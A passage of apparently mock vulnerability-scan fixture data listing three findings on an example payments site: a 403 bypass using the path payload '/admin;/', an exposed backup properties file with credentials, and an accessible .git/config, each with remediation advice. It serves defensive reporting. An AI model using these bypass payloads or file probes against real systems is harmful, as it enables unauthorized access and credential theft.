    mitreAttackIds: ['T1563'],
    confidenceScore: 85,
    status: 'OPEN',
    isConfirmed: false,
  },
  {
    id: 'dast-f-023',
    scanId: 'dast-scan-003',
    type: 'bypassing_403',
    owaspCategory: 'A01:2021 Broken Access Control',
    cweId: 'CWE-284',
    severity: 'HIGH',
    cvssScore: 7.5,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N',
    riskScore: 75,
    title: '403 Bypass via Path Manipulation',
    description: 'The /admin panel returns 403 when accessed directly, but access controls can be bypassed using path variations (/Admin, /admin/, /admin;/etc).',
    businessImpact: 'Unauthorized access to admin functionality. Attacker can manage users, view sensitive data, and modify system configuration.',
    affectedUrl: 'https://payments.example.com/admin',
    affectedParameter: null,
    payload: '/admin;/',
    remediation: 'Implement path normalization before access control checks. Use framework-level authorization rather than URL-based blocking.',
    remediationCode: null,
    aiEnrichmentData: null,
    pciDssRefs: ['7.1'],
    soc2Refs: ['CC6.1', 'CC6.3'],
    mitreAttackIds: ['T1190'],
    confidenceScore: 82,
    status: 'OPEN',
    isConfirmed: true,
  },
  {
    id: 'dast-f-024',
    scanId: 'dast-scan-003',
    type: 'backup_file_disclosure',
    owaspCategory: 'A05:2021 Security Misconfiguration',
    cweId: 'CWE-530',
    severity: 'HIGH',
    cvssScore: 7.5,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N',
    riskScore: 72,
    title: 'Backup File Accessible',
    description: 'A backup file (application.properties.bak) was found at the web root, containing database connection strings and API keys.',
    businessImpact: 'Database credentials and API keys exposed. Attacker can directly access databases and third-party services.',
    affectedUrl: 'https://payments.example.com/application.properties.bak',
    affectedParameter: null,
    payload: null,
    remediation: 'Remove all backup files from web-accessible directories. Configure the web server to block access to .bak, .old, .swp, and similar extensions.',
    remediationCode: null,
    aiEnrichmentData: null,
    pciDssRefs: [],
    soc2Refs: ['CC7.1'],
    mitreAttackIds: ['T1083'],
    confidenceScore: 99,
    status: 'OPEN',
    isConfirmed: true,
  },
  {
    id: 'dast-f-025',
    scanId: 'dast-scan-003',
    type: 'hidden_file',
    owaspCategory: 'A05:2021 Security Misconfiguration',
    cweId: 'CWE-538',
    severity: 'MEDIUM',
    cvssScore: 5.3,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N',
    riskScore: 45,
    title: 'Hidden File Found — .git/config',
    description: 'The .git/config file is accessible at the web root, exposing repository URLs, branch names, and potentially credentials.',
    businessImpact: 'Source code repository information leaked. May enable source code download and credential extraction.',
    affectedUrl: 'https://payments.example.com/.git/config',
    affectedParameter: null,
    payload: null,
    remediation: 'Block access to hidden files and directories (.git, .svn, .env, etc.) at the web server level.',
    remediationCode: null,
    aiEnrichmentData: null,
    pciDssRefs: [],
    soc2Refs: ['CC7.1'],
    mitreAttackIds: ['T1083'],
    confidenceScore: 99,
    status: 'OPEN',
    isConfirmed: true,
  },
]
